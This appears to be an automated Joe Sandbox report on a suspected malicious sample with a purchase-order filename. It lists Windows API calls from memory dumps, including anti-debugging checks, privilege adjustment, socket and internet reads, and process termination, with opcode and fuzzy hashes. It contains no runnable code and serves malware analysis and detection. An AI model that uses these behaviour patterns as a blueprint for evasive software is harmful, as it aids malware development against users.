                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                                      • String ID: ($,2K$<2K$|
                                                                                                                                                                                                      • API String ID: 1659193697-2182472957
                                                                                                                                                                                                      • Opcode ID: 524c958fd482d931795d13b601762ad0f23e08667b808a05e84820537726d62a
                                                                                                                                                                                                      • Instruction ID: b3f271005b524aebf8f91158433a8eea4ac4193e129ed65323c4eb9f1a4cf8f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 524c958fd482d931795d13b601762ad0f23e08667b808a05e84820537726d62a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF323675A007059FD728DF29C4809AAB7F0FF48310B15C56EE59ADB3A2E774E981CB48
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0045A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E
                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00459296
                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000000), ref: 004592B9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4170576061-0
                                                                                                                                                                                                      • Opcode ID: 38a9d122883346d3f8cb65db6244ab408325e3e1faa11902ac3d89c5ea658cdf
                                                                                                                                                                                                      • Instruction ID: f31afdfd231ffbce65f4c59d6c83f29495bd5957bcfb5fbfa73d0d0b248d16ca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38a9d122883346d3f8cb65db6244ab408325e3e1faa11902ac3d89c5ea658cdf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8641F570600104AFDB10AB24C842E7E77EDEF08328F04445EF956A73D3DB789D418B99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0044EB8A
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0044EBBA
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0044EBCF
                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044EBE0
                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0044EC0E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2387731787-0
                                                                                                                                                                                                      • Opcode ID: 7decc0964aa9a0c18d0d93d071e471d8afd33c0129de16156793592e0011829b
                                                                                                                                                                                                      • Instruction ID: f4d4502bd19f39e4eae8a827b2e93a7102bde83d7ab60724816fa37c5e4c86a1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7decc0964aa9a0c18d0d93d071e471d8afd33c0129de16156793592e0011829b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9041DF306006019FD708DF29C4D1A9AB3E4FF49324F10456EEA5A8B3A1DB39B985CB99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                                                                      • Opcode ID: dbfed87c38ee92bf59b292af6f5fadc4ca6e903502444fd297db996fb690681f
                                                                                                                                                                                                      • Instruction ID: b914647029d33102a7cfa3aa289e3b8462c5c21d78575f5ca8fb078c54b4ff5d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbfed87c38ee92bf59b292af6f5fadc4ca6e903502444fd297db996fb690681f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0711E2317011146BE7212F26DC44EAF7799EF46720B04052FF849D3281EF78980386AE
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0041E014,75920AE0,0041DEF1,0049DC38,?,?), ref: 0041E02C
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0041E03E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                                                                                                      • Opcode ID: d4bcc8df34a69c75c0e0aef847fce7452e4d83df1b9fa05b59668c201de80aca
                                                                                                                                                                                                      • Instruction ID: d3a2d7f9251202634d31430f40abaa6068e993e0ea93885ba20427a44fa0b13a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4bcc8df34a69c75c0e0aef847fce7452e4d83df1b9fa05b59668c201de80aca
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BD05E348007229EC7215B62E9087977BD4AF04700F28482FE88192290D6F8D8808768
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F
                                                                                                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 0041B22F
                                                                                                                                                                                                        • Part of subcall function 0041B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0041B5A5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Proc$LongWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2749884682-0
                                                                                                                                                                                                      • Opcode ID: 7cf0e01d325c05872215fadf7fd1876a518e877bd8c73a3ee908c1b70c179c08
                                                                                                                                                                                                      • Instruction ID: 2271108539b8a3bcad80f9fb504b99785085641c9eb99831aee7754bc93f6997
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cf0e01d325c05872215fadf7fd1876a518e877bd8c73a3ee908c1b70c179c08
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBA14C70114105BAD7246B2B9C4CDFF295CEB4A348B14829FF845D6292DB3C9C8692FF
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004543BF,00000000), ref: 00454FA6
                                                                                                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00454FD2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 599397726-0
                                                                                                                                                                                                      • Opcode ID: b15ee36bd8f8c1997b8993369eb904f73e6a1371bf2522d5b0c7af915fedb5b3
                                                                                                                                                                                                      • Instruction ID: fc2494c5d1090c68671fb56a484849f12dd1ab69f199119c895c0e360fce0958
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b15ee36bd8f8c1997b8993369eb904f73e6a1371bf2522d5b0c7af915fedb5b3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5541FA72604205BFEB10DE85DC81EBF77BCEB8071EF10402FFA0566182D6799E89D668
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AF1459
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AF1463
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00AF1470
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                      • Opcode ID: 13c39c8bb375b522b9e24c2fbfea5b86dfdc7851a990d1386451ba74fc9608a3
                                                                                                                                                                                                      • Instruction ID: 5435b5f0454b8e385174f64a97a59359c0a3159664e5e6eb2b6d98c877a76e04
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13c39c8bb375b522b9e24c2fbfea5b86dfdc7851a990d1386451ba74fc9608a3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C31D5B590122C9BCB21DFA8D9887DDBBB8AF08310F5041DAF51CA7250EB309B858F45
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                      • String ID: \QK
                                                                                                                                                                                                      • API String ID: 4104443479-3628726987
                                                                                                                                                                                                      • Opcode ID: 1c3005cb5f0da8ad46b7d66dd3d69215c08c54ff01ccddff8815d6f2f27610d0
                                                                                                                                                                                                      • Instruction ID: 87b044c4d6a9c987ae79e4dbe16587d7b3263cda5fc705f545ac5aa4043bf09a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c3005cb5f0da8ad46b7d66dd3d69215c08c54ff01ccddff8815d6f2f27610d0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1A26D70E04219CFDB24DF58C4806ADB7B1FF48314F2581AAD859AB391D778AE82CF59
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0044E20D
                                                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0044E267
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0044E2B4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1682464887-0
                                                                                                                                                                                                      • Opcode ID: aafbfce44185f70870d8afe07bf37bb2e422d67a6981e374a3d90d68d9f72eff
                                                                                                                                                                                                      • Instruction ID: fcb039aee163e110a326b73cd7f822dd4e4f4f3e0c392ce8ae1e703b4088fde6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: aafbfce44185f70870d8afe07bf37bb2e422d67a6981e374a3d90d68d9f72eff
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46219D35A00118EFDB00EFA5D884EEDBBB8FF48314F0484AAE905E7391DB359905CB58
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041F4EA: std::exception::exception.LIBCMT ref: 0041F51E
                                                                                                                                                                                                        • Part of subcall function 0041F4EA: __CxxThrowException@8.LIBCMT ref: 0041F533
                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0043B1BA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1922334811-0
                                                                                                                                                                                                      • Opcode ID: d28d35a6c3fdcac1336cde914a0e4f9c973a41ee16441fe454c374b171a81ab2
                                                                                                                                                                                                      • Instruction ID: d34e02cad222c35508b3879b7c877537743fe1e9ff263f18776d04d4c75f896d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d28d35a6c3fdcac1336cde914a0e4f9c973a41ee16441fe454c374b171a81ab2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E611C1B1900204AFE7189F54DCC5D6BB7BDFB48354B20892EF45697241DB74FC428B64
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00446623
                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00446664
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0044666F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 33631002-0
                                                                                                                                                                                                      • Opcode ID: b8fd0c6e3683981e9efe52009cb6122e78433f0100f3abba2d1de88c949d02f3
                                                                                                                                                                                                      • Instruction ID: 1683307e1cd0e27eae8824ccb2fe6fa6d8dcf54692714181804254f96fd723f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8fd0c6e3683981e9efe52009cb6122e78433f0100f3abba2d1de88c949d02f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E115271E01228BFEB109F98DC44BAF7BBCEB45710F114566F900E6290D7B05E018BA5
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00447223
                                                                                                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0044723A
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 0044724A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                                                      • Opcode ID: c31be835109406b49b1e5b9f6e5b02849ad6eb7177ad8e108ba26c0d5b9f8f92
                                                                                                                                                                                                      • Instruction ID: 57aeaf038d2452313bcdb42708262a1761e9db82bc135c3fee38054b2013e197
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c31be835109406b49b1e5b9f6e5b02849ad6eb7177ad8e108ba26c0d5b9f8f92
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FF01D76E05309BFDF04DFE4DD89AEEBBB8FF09205F504869A602E21D1E3749A449B14
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000003,?,00AF3F13,00000003,00B0DE80,0000000C,00AF403D,00000003,00000002,00000000,?,00AF2038,00000003), ref: 00AF3F5E
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00AF3F13,00000003,00B0DE80,0000000C,00AF403D,00000003,00000002,00000000,?,00AF2038,00000003), ref: 00AF3F65
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00AF3F77
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1703294689-0
